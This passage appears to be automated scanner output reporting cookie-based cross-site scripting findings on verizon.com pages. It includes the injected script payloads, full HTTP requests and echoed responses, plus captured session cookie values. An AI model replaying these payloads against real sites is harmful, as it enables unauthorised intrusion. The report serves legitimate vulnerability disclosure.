Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:16 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:16 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "bc4f0"-alert(1)-"1fba9dfb345"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

2.889. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3a42'><script>alert(1)</script>fbf87ca090d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXb3a42'><script>alert(1)</script>fbf87ca090d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 102485
Expires: Sat, 20 Nov 2010 00:12:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:19 GMT; path=/
Set-Cookie: ContextInfo_State=TXb3a42'><script>alert(1)</script>fbf87ca090d; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:19 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:19 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:19 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB3A42'><SCRIPT>ALERT(1)</SCRIPT>FBF87CA090D ' />
...[SNIP]...

2.890. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18907'><script>alert(1)</script>cc88d71fd80 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX18907'><script>alert(1)</script>cc88d71fd80; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79336
Expires: Sat, 20 Nov 2010 00:13:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:02 GMT; path=/
Set-Cookie: ContextInfo_State=TX18907'><script>alert(1)</script>cc88d71fd80; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:02 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:02 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:02 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX18907'><SCRIPT>ALERT(1)</SCRIPT>CC88D71FD80 ' />
...[SNIP]...

2.891. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8f58f'><script>alert(1)</script>45f51d22094 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8f58f'><script>alert(1)</script>45f51d22094; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110658
Expires: Sat, 20 Nov 2010 00:12:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:42 GMT; path=/
Set-Cookie: ContextInfo_State=TX8f58f'><script>alert(1)</script>45f51d22094; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:42 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8F58F'><SCRIPT>ALERT(1)</SCRIPT>45F51D22094 ' />
...[SNIP]...

2.892. http://www22.verizon.com/Residential/FiOSTV/Plans/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Plans/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1ae94'><script>alert(1)</script>3541545eeb1 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Plans/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX1ae94'><script>alert(1)</script>3541545eeb1; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 129756
Expires: Sat, 20 Nov 2010 03:28:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:28:47 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:47 GMT; path=/
Set-Cookie: ContextInfo_State=TX1ae94'><script>alert(1)</script>3541545eeb1; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:47 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:47 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:47 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX1AE94'><SCRIPT>ALERT(1)</SCRIPT>3541545EEB1 ' />
...[SNIP]...

2.893. http://www22.verizon.com/Residential/FiOSTV/Plans/ [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Plans/

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87335"-alert(1)-"b826a7eceda was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSTV/Plans/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=87335"-alert(1)-"b826a7eceda; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 138928
Expires: Sat, 20 Nov 2010 03:28:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:28:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:44 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "87335"-alert(1)-"b826a7eceda"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
var m_view = new VZT.MasterNavView();
var m_mod
...[SNIP]...

2.894. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Plans/Plans.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c95e"-alert(1)-"deeeb3c52e9 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSTV/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=5c95e"-alert(1)-"deeeb3c52e9; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; 